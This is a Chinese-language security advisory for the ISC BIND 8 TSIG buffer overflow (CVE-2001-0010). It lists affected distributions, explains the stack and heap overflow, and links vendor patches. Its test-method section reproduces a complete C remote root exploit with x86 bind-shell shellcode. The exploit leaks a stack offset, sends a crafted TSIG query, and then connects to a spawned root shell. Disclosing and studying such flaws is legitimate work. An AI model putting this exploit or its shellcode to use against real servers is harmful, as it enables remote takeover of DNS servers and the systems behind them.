安全研究
安全漏洞
ISC Bind 8 TSIG远程缓冲区溢出漏洞
发布日期:2001-01-29
更新日期:2001-01-29
受影响系统:
ISC BIND 8.2,8.2.1,8.2.2 p5,8.2.2 p6,8.不受影响系统:
- Caldera eDesktop 2.4
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Caldera OpenLinux Desktop 2.3
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1.1
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Debian Linux 2.3 arm
- Debian Linux 2.3 68k
- Debian Linux 2.3 powerpc
- Debian Linux 2.3 alpha
- Debian Linux 2.3 sparc
ISC BIND 8.2.1
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1.1
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Debian Linux 2.3 alpha
- Debian Linux 2.3 68k
- Debian Linux 2.3 powerpc
- Debian Linux 2.3 arm
- Debian Linux 2.3 sparc
- Debian Linux 2.2 alpha
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 68k
- Debian Linux 2.2
- Debian Linux 2.2 arm
- Debian Linux 2.2 sparc
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- Mandrake Linux 7.2
- Mandrake Linux 7.1
- Mandrake Linux 7.0
- Mandrake Linux 6.1
- Mandrake Linux 6.0
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 x86
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 x86
- RedHat Linux 6.2
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 4.2
- RedHat Linux 4.1
- SuSE Linux 6.4 powerpc
- SuSE Linux 6.4 alpha
- SuSE Linux 6.3
- SuSE Linux 6.3 alpha
- SuSE Linux 6.2
- SuSE Linux 6.1 alpha
- SuSE Linux 6.1
- SuSE Linux 6.0
- Trustix Secure Linux 1.01
- Trustix Secure Linux 1.0
ISC BIND 8.2.2 p5
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1.1
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Debian Linux 2.3 arm
- Debian Linux 2.3 sparc
- Debian Linux 2.3 alpha
- Debian Linux 2.3 powerpc
- Debian Linux 2.3 68k
- Debian Linux 2.2 arm
- Debian Linux 2.2 sparc
- Debian Linux 2.2 alpha
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 68k
- Debian Linux 2.2
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- Mandrake Linux 7.2
- Mandrake Linux 7.1
- Mandrake Linux 7.0
- Mandrake Linux 6.1
- Mandrake Linux 6.0
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 x86
- RedHat Linux 7.0 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 x86
- RedHat Linux 5.2 sparc
- RedHat Linux 4.2
- RedHat Linux 4.1
- SuSE Linux 6.4 powerpc
- SuSE Linux 6.4 alpha
- SuSE Linux 6.3
- SuSE Linux 6.3 alpha
- SuSE Linux 6.2
- SuSE Linux 6.1 alpha
- SuSE Linux 6.1
- SuSE Linux 6.0
- Trustix Secure Linux 1.01
- Trustix Secure Linux 1.0
ISC BIND 8.2.2 p6
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1.1
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Debian Linux 2.3 68k
- Debian Linux 2.3 arm
- Debian Linux 2.3 sparc
- Debian Linux 2.3 alpha
- Debian Linux 2.3 powerpc
- Debian Linux 2.2 68k
- Debian Linux 2.2
- Debian Linux 2.2 arm
- Debian Linux 2.2 sparc
- Debian Linux 2.2 alpha
- Debian Linux 2.2 powerpc
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- Mandrake Linux 7.2
- Mandrake Linux 7.1
- Mandrake Linux 7.0
- Mandrake Linux 6.1
- Mandrake Linux 6.0
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 x86
- RedHat Linux 7.0 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 x86
- RedHat Linux 6.2
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 x86
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 x86
- RedHat Linux 4.2
- RedHat Linux 4.1
- SuSE Linux 6.4 powerpc
- SuSE Linux 6.4 alpha
- SuSE Linux 6.3
- SuSE Linux 6.3 alpha
- SuSE Linux 6.2
- SuSE Linux 6.1 alpha
- SuSE Linux 6.1
- SuSE Linux 6.0
- Trustix Secure Linux 1.01
- Trustix Secure Linux 1.0
ISC BIND 8.2.2 p7
- Caldera eDesktop 2.4
- Caldera eServer 2.3
- Caldera OpenLinux Desktop 2.3
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1.1
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Debian Linux 2.3 alpha
- Debian Linux 2.3 sparc
- Debian Linux 2.3 arm
- Debian Linux 2.3 68k
- Debian Linux 2.3 powerpc
- Debian Linux 2.2 alpha
- Debian Linux 2.2 sparc
- Debian Linux 2.2 arm
- Debian Linux 2.2
- Debian Linux 2.2 68k
- Debian Linux 2.2 powerpc
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- Mandrake Linux 7.2
- Mandrake Linux 7.1
- Mandrake Linux 7.0
- Mandrake Linux 6.1
- Mandrake Linux 6.0
- RedHat Linux 7.0 x86
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 sparc
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 x86
- RedHat Linux 6.1
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 x86
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 4.2
- RedHat Linux 4.1
- SuSE Linux 6.4 powerpc
- SuSE Linux 6.4 alpha
- SuSE Linux 6.3
- SuSE Linux 6.3 alpha
- SuSE Linux 6.2
- SuSE Linux 6.1
- SuSE Linux 6.1 alpha
- SuSE Linux 6.0
- Trustix Secure Linux 1.01
- Trustix Secure Linux 1.0
ISC BIND 8.2.3描述:
- EnGarde Secure Linux 1.0.1
ISC BIND 9.0
- EnGarde Secure Linux 1.0.1
ISC BIND 9.0
- SuSE Linux 7.0 alpha
ISC BIND 9.0
- SuSE Linux 7.0 sparc
ISC BIND 9.0
- SuSE Linux 7.0 i386
ISC BIND 9.0
- SuSE Linux 7.0 powerpc
BUGTRAQ ID: 2302
CVE(CAN) ID: CVE-2001-0010
BIND是一个实现域名服务协议的服务器软件。它在Internet上被广为使用。
它在TSIG(传输签名)的实现上存在一个缓冲区溢出漏洞,可能允许远程攻击者在BIND服务器上执行任意代码。由于溢出发生在DNS请求的初始化过程中,因此并不需要攻击者控制任何地权威DNS服务器,而且此问题影响所有递归和非递归的DNS服务器。
当收到一个DNS请求时,根据传输协议的不同,DNS请求的数据可能被存放到heap区或者是堆栈中。如果收到的是UDP报文,函数datagram_read()负责将其读入堆栈中的一个513字节大小的缓冲区(u.buf);如果收到的是TCP报文,函数stream_getlen()负责将其读入位于heap区的一个64k大小的缓冲区(sp->s_buf).BIND使用两个关键的变量来跟踪这些缓冲区的使用情况:一个包含缓冲区中的实际长度,名为"msglen";另一个变量用来跟踪缓冲区的剩余长度,名为"buflen"。当BIND收到一个DNS信息后,msglen被初始化成从网络中接收到的数据长度。buflen被初始化成用来读取这个消息的缓冲区的大小。(对于UDP报文为512字节,对TCP报文为64k)。正常情况下,当BIND处理一个请求时,它会将回复记录附加到请求中。然后它会编辑DNS头,使其反映出这种变化,并发送此响应报文。在此过程中,BIND假设msglen加上buflen的大小等于缓冲区的原长度。从BIND 8.2开始,在BIND处理一个DNS请求之前,它会检查DNS信息的附加区域,检查是否有TSIG资源记录。函数ns_find_tsig()被用来进行这个检查。如果一个有效的TSIG标记被找到,但相应的安全字(security key)却没有找到,BIND将会报错,并绕过了正常的请求处理过程。结果,msglen和buflen都仍然保持它们的初始值。BIND将此请求看作时一个错误请求,它使用原来的请求缓冲区,在问题域中增加一段TSIG信息。这时候,BIND假设请求缓冲区的大小仍然是msglen+buflen.正常情况下,这是正确的,然而,在这种特殊情况下,msglen+buflen几乎是实际缓冲区大小的两倍!这样,当BIND使用ns_sign()函数添加TSIG信息时,它们将被填充在缓冲区之外。由于有效的安全字没有被发现,ns_sign()将只会增加很少的一些字节,而且字节的内容也是有限的。因此这可能导致两种类型的攻击。对于UDP请求,请求缓冲区在堆栈中,攻击者可以使用一些固定的值来覆盖datagram_read()函数保存在堆栈中的激活记录。在x86平台下,用0覆盖保留栈帧指针的最小字节,可能导致该指针指向原来的DNS请求缓冲区。这种单字节溢出可能导致执行任意代码。对于TCP请求,请求缓冲区在heap区中。攻击者可以使用一些固定的值来覆盖malloc()动态分配时的一些边界字节,这样下一个边界信息就可以从攻击者控制的缓冲区中读取,这可能导致一个恶意的指针覆盖,攻击者也可能执行任意代码。
<*来源:Anthony Osborne
John McDonald
链接:http://www.cert.org/advisories/CA-2001-02.html
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000377
http://web.opennet.ru/base/netsoft/988181599_966.txt.html
http://www.caldera.com/support/security/advisories/CSSA-2001-008.1.txt
ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.13/
ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.16
http://www.debian.org/security/2001/dsa-026
https://www.redhat.com/support/errata/RHSA-2001-007.html
http://www.suse.com/de/support/security/2001_03_[需要添加]_txt.txt
http://www.turbolinux.com/pipermail/tl-security-announce/2001-February/000034.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg <ian@cypherpunks.ca>
* Jonathan Wilkins <jwilkins@bitland.net>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [adresadeforward@yahoo.com] (the master of jmpz),
* lucysoft [lucysoft@hotmail.com] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez - canaris
* greetz - blizzard, netman.
* creditz - anathema <anathema@hack.co.za> for the original shellcode
* - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#define max(a,b) ((a)>(b)?(a):(b))
#define BUFFSIZE 4096
int argevdisp1, argevdisp2;
char shellcode[] =
/* The numbers at the right indicate the number of bytes the call takes
* and the number of bytes used so far. This needs to be lower than
* 62 in order to fit in a single Query Record. 2 are used in total to
* send the shell code
*/
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
spot first */
"\xeb\x44" /* jmp intr */ // 2 - 2
/* start: */
"\x5e" /* popl %esi */ // 1 - 3
/* socket() */
"\x29\xc0" /* subl %eax, %eax */ // 2 - 5
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */ // 3 - 8
"\x40" /* incl %eax */ // 1 - 9
"\x89\xc3" /* movl %eax, %ebx */ // 2 - 11
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ // 3 - 14
"\x40" /* incl %eax */ // 1 - 15
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */ // 3 - 18
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 21
"\xb0\x66" /* movb $0x66, %al */ // 2 - 23
"\xcd\x80" /* int $0x80 */ // 2 - 25
/* bind() */
"\x43" /* incl %ebx */ // 1 - 26
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ // 4 - 30
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ // 4 - 34
"\x88\x46\x08" /* movb %al, 0x08(%esi) */ // 3 - 37
"\x29\xc0" /* subl %eax, %eax */ // 2 - 39
"\x89\xc2" /* movl %eax, %edx */ // 2 - 41
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"\xb0\x90" /* movb $0x90, %al */ // 2 - 46
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ // 4 - 50
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ // 3 - 53
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ // 3 - 56
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 59
"\xeb\x02" /* jmp cont */ // 2 - 2
/* intr: */
"\xeb\x43" /* jmp callz */ // 2 - 4
/* cont: */
"\xb0\x66" /* movb $0x66, %al */ // 2 - 6
"\xcd\x80" /* int $0x80 */ // 2 - 10
/* listen() */
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ // 3 - 11
"\x43" /* incl %ebx */ // 1 - 12
"\x43" /* incl %ebx */ // 1 - 13
"\xb0\x66" /* movb $0x66, %al */ // 2 - 15
"\xcd\x80" /* int $0x80 */ // 2 - 17
/* accept() */
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ // 3 - 20
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */ // 3 - 23
"\xb0\x66" /* movb $0x66, %al */ // 2 - 25
"\x43" /* incl %ebx */ // 1 - 26
"\xcd\x80" /* int $0x80 */ // 1 - 27
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3" /* xchgb %al, %bl */ // 2 - 29
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 31
"\x29\xc9" /* subl %ecx, %ecx */ // 2 - 33
"\xcd\x80" /* int $0x80 */ // 2 - 35
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 37
"\x41" /* incl %ecx */ // 1 - 38
"\xcd\x80" /* int $0x80 */ // 2 - 40
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 42
"\x41" /* incl %ecx */ // 1 - 43
"\xcd\x80" /* int $0x80 */ // 2 - 45
/* execve() */
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */ // 3 - 48
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ // 3 - 51
"\x87\xf3" /* xchgl %esi, %ebx */ // 2 - 53
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ // 3 - 56
"\xb0\x0b" /* movb $0x0b, %al */ // 2 - 58
"\xcd\x80" /* int $0x80 */ // 2 - 60
"\x90"
/* callz: */
"\xe8\x72\xff\xff\xff" /* call start */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */ // 8 - 13
unsigned long resolve_host(char* host)
{
long res;
struct hostent* he;
if (0 > (res = inet_addr(host)))
{
if (!(he = gethostbyname(host)))
return(0);
res = *(unsigned long*)he->h_addr;
}
return(res);
}
int dumpbuf(char *buff, int len)
{
char line[17];
int x;
/* print out a pretty hex dump */
for(x=0;x<len;x++){
if(!(x%16) && x){
line[16] = 0;
printf("\t%s\n", line);
}
printf("%02X ", (unsigned char)buff[x]);
if(isprint((unsigned char)buff[x]))
line[x%16]=buff[x];
else
line[x%16]='.';
}
printf("\n");
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "uname -a; id;\n", 15, 0);
for(;;)
{
FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);
if(select(fmax, &fds, NULL, NULL, NULL) < 0)
{
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{
bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
{
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
if(send(sockd, buff, ret, 0) != ret)
{
fprintf(stderr, "Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
}
connection(struct sockaddr_in host)
{
int sockd;
host.sin_port = htons(36864);
printf("[*] connecting..\n");
usleep(2000);
if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
exit(EXIT_FAILURE);
}
if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1)
{
printf("[*] wait for your shell..\n");
usleep(500);
runshell(sockd);
}
else
{
printf("[x] error: named not vulnerable or wrong offsets used\n");
}
close(sockd);
}
int infoleak_qry(char* buff)
{
HEADER* hdr;
int n, k;
char* ptr;
int qry_space = 12;
int dummy_names = 7;
int evil_size = 0xff;
memset(buff, 0, BUFFSIZE);
hdr = (HEADER*)buff;
hdr->id = htons(0xbeef);
hdr->opcode = IQUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(0);
hdr->nscount = htons(0);
hdr->ancount = htons(1);
hdr->arcount = htons(0);
ptr = buff + sizeof(HEADER);
printf("[d] HEADER is %d long\n", sizeof(HEADER));
n = 62;
for(k=0; k < dummy_names; k++)
{
*ptr++ = n;
ptr += n;
}
ptr += 1;
PUTSHORT(1/*ns_t_a*/, ptr); /* type */
PUTSHORT(T_A, ptr); /* class */
PUTLONG(1, ptr); /* ttl */
PUTSHORT(evil_size, ptr); /* our *evil* size */
return(ptr - buff + qry_space);
}
int evil_query(char* buff, int offset)
{
int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offset0;
HEADER* hdr;
char *ptr;
int k, bufflen;
u_int n, m;
u_short s;
int i;
int shelloff, shellstarted, shelldone;
int towrite, ourpack;
int n_dummy_rrs = 7;
printf("[d] evil_query(buff, %08x)\n", offset);
printf("[d] shellcode is %d long\n", sizeof(shellcode));
shelladdr = offset - 0x200;
lameaddr = shelladdr + 0x300;
ourpack = offset - 0x250 + 2;
towrite = (offset & ~0xff) - ourpack - 6;
printf("[d] olb = %d\n", (unsigned char) (offset & 0xff));
rroffsetidx = towrite / 70;
offset0 = towrite - rroffsetidx * 70;
if ((offset0 > 52) || (rroffsetidx > 6))
{
printf("[x] could not write our data in buffer (offset0=%d, rroffsetidx=%d)\n", offset0, rroffsetidx);
return(-1);
}
rrshellidx = 1;
deplshellcode = 2;
hdr = (HEADER*)buff;
memset(buff, 0, BUFFSIZE);
/* complete the header */
hdr->id = htons(0xdead);
hdr->opcode = QUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(n_dummy_rrs);
hdr->ancount = htons(0);
hdr->arcount = htons(1);
ptr = buff + sizeof(HEADER);
shellstarted = 0;
shelldone = 0;
shelloff = 0;
n = 63;
for (k = 0; k < n_dummy_rrs; k++)
{
*ptr++ = (char)n;
for(i = 0; i < n-2; i++)
{
if((k == rrshellidx) && (i == deplshellcode) && !shellstarted)
{
printf("[*] injecting shellcode at %d\n", k);
shellstarted = 1;
}
if ((k == rroffsetidx) && (i == offset0))
{
*ptr++ = lameaddr & 0x000000ff;
*ptr++ = (lameaddr & 0x0000ff00) >> 8;
*ptr++ = (lameaddr & 0x00ff0000) >> 16;
*ptr++ = (lameaddr & 0xff000000) >> 24;
*ptr++ = shelladdr & 0x000000ff;
*ptr++ = (shelladdr & 0x0000ff00) >> 8;
*ptr++ = (shelladdr & 0x00ff0000) >> 16;
*ptr++ = (shelladdr & 0xff000000) >> 24;
*ptr++ = argevdisp1 & 0x000000ff;
*ptr++ = (argevdisp1 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp1 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp1 & 0xff000000) >> 24;
*ptr++ = argevdisp2 & 0x000000ff;
*ptr++ = (argevdisp2 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp2 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp2 & 0xff000000) >> 24;
i += 15;
}
else
{
if (shellstarted && !shelldone)
{
*ptr++ = shellcode[shelloff++];
if(shelloff == (sizeof(shellcode)))
shelldone=1;
}
else
{
*ptr++ = i;
}
}
}
/* OK: this next set of bytes constitutes the end of the
* NAME field, the QTYPE field, and the QCLASS field.
* We have to have the shellcode skip over these bytes,
* as well as the leading 0x3f (63) byte for the next
* NAME field. We do that by putting a jmp instruction
* here.
*/
*ptr++ = 0xeb;
if (k == 0)
{
*ptr++ = 10;
/* For alignment reasons, we need to stick an extra
* NAME segment in here, of length 3 (2 + header).
*/
m = 2;
*ptr++ = (char)m; // header
ptr += 2;
}
else
{
*ptr++ = 0x07;
}
/* End the NAME with a compressed pointer. Note that it's
* not clear that the value used, C0 00, is legal (it
* points to the beginning of the packet), but BIND apparently
* treats such things as name terminators, anyway.
*/
*ptr++ = 0xc0; /*NS_CMPRSFLGS*/
*ptr++ = 0x00; /*NS_CMPRSFLGS*/
ptr += 4; /* QTYPE, QCLASS */
}
/* Now we make the TSIG AR */
*ptr++ = 0x00; /* Empty name */
PUTSHORT(0xfa, ptr); /* Type TSIG */
PUTSHORT(0xff, ptr); /* Class ANY */
bufflen = ptr - buff;
// dumpbuf(buff, bufflen);
return(bufflen);
}
long xtract_offset(char* buff, int len)
{
long ret;
/* Here be dragons. */
/* (But seriously, the values here depend on compilation options
* used for BIND.
*/
ret = *((long*)&buff[0x214]);
argevdisp1 = 0x080d7cd0;
argevdisp2 = *((long*)&buff[0x264]);
printf("[d] argevdisp1 = %08x, argevdisp2 = %08x\n",
argevdisp1, argevdisp2);
// dumpbuf(buff, len);
return(ret);
}
int main(int argc, char* argv[])
{
struct sockaddr_in sa;
int sock;
long address;
char buff[BUFFSIZE];
int len, i;
long offset;
socklen_t reclen;
unsigned char foo[4];
printf("[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix\n");
printf("[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net\n\n");
address = 0;
if (argc < 2)
{
printf("[*] usage : %s host\n", argv[0]);
return(-1);
}
if (!(address = resolve_host(argv[1])))
{
printf("[x] unable to resolve %s, try using an IP address\n", argv[1]);
return(-1);
} else {
memcpy(foo, &address, 4);
printf("[*] attacking %s (%d.%d.%d.%d)\n", argv[1], foo[0], foo[1], foo[2], foo[3]);
}
sa.sin_family = AF_INET;
if (0 > (sock = socket(sa.sin_family, SOCK_DGRAM, 0)))
{
return(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
sa.sin_addr.s_addr= address;
len = infoleak_qry(buff);
printf("[d] infoleak_qry was %d long\n", len);
len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (len < 0)
{
printf("[*] unable to send iquery\n");
return(-1);
}
reclen = sizeof(sa);
len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&sa, &reclen);
if (len < 0)
{
printf("[x] unable to receive iquery answer\n");
return(-1);
}
printf("[*] iquery resp len = %d\n", len);
offset = xtract_offset(buff, len);
printf("[*] retrieved stack offset = %x\n", offset);
len = evil_query(buff, offset);
if(len < 0){
printf("[x] error sending tsig packet\n");
return(0);
}
sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (0 > close(sock))
{
return(-1);
}
connection(sa);
return(0);
}
/* www.hack.co.za [2 March 2001]*/
建议:
厂商补丁:
Caldera
-------
Caldera已经为此发布了一个安全公告(CSSA-2001-008.1)以及相应补丁:
CSSA-2001-008.1:BIND buffer overflow
链接:http://www.caldera.com/support/security/advisories/CSSA-2001-008.1.txt
补丁下载:
Caldera RPM OpenLinux 2.3 bind-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/RPMS/bind-8.2.3-1.i386.rpm
Caldera RPM OpenLinux 2.3 bind-doc-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/RPMS/bind-doc-8.2.3-1.i386.rpm
Caldera RPM OpenLinux 2.3 bind-utils-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/RPMS/bind-utils-8.2.3-1.i386.rpm
Caldera RPM eServer 2.3.1/eBuilder for ECential 3.0 bind-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/RPMS/bind-8.2.3-1.i386.rpm
Caldera RPM eServer 2.3.1/eBuilder for ECential 3.0 bind-doc-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/RPMS/bind-doc-8.2.3-1.i386.rpm
Caldera RPM eServer 2.3.1/eBuilder for ECential 3.0 bind-utils-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/RPMS/bind-utils-8.2.3-1.i386.rpm
Caldera RPM eDesktop 2.4 bind-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/RPMS/bind-8.2.3-1.i386.rpm
Caldera RPM eDesktop 2.4 bind-doc-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/RPMS/bind-doc-8.2.3-1.i386.rpm
Caldera RPM eDesktop 2.4 bind-utils-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/RPMS/bind-utils-8.2.3-1.i386.rpm
Caldera Hotfix OpenServer <= 5.0.6a newbind.tar.Z
ftp://ftp.sco.com/pub/security/openserver/sr379322/newbind.tar.Z
Conectiva
---------
Conectiva已经为此发布了一个安全公告(CLA-2001:377)以及相应补丁:
CLA-2001:377:Buffer overflow in bind allows a remote exploit
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000377
补丁下载:
tp://atualizacoes.conectiva.com.br/4.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/bind-8.2.3-1cl.src.rpm
